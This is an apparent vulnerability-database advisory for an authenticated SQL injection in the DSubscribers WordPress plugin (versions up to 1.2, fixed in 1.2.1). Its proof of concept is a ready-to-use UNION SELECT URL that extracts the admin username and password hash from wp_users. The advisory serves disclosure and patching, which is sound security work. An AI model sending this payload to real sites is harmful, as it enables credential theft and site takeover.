DSubscribers <= 1.2 – Authenticated SQL Injection

Description

The DSubscribers WordPress plugin was affected by an Authenticated SQL Injection security vulnerability.

Proof of Concept

Proof of Concept:

1 – Login with admin user:

2 – Url attack:
 http://target/wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass) FROM wp_users WHERE ID=1

Affects Plugins

dsubscribers

Fixed in 1.2.1

References

URL

https://lenonleite.com.br/en/2017/07/06/dsubscribers-1-2-plugin-wordpress-sql-injection/

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Submitter

Lenon Leite / Log.pt

Submitter website

http://lenonleite.com.br/en/

Submitter twitter

log_oscon

Verified

WPVDB ID

44a1e71b-a942-4252-999d-b8c8b42872a9

Timeline

Publicly Published

2017-07-06 (about 8 years ago)

Added

2017-07-16 (about 8 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2025-10-14

Title

Wp tabber widget <= 4.0 - Authenticated (Contributor+) SQL Injection

Published

2023-06-05

Title

FormCraft Premium < 3.9.7 - Admin+ SQLi

Published

2025-01-24

Title

Form Builder CP < 1.2.42 - Authenticated (Contributor+) SQL Injection

Published

2026-01-05

Title

Automotive Listings < 18.7 - Unauthenticated SQL Injection

Published

2015-07-09

Title

WP Statistics <= 9.4 - Authenticated SQL Injection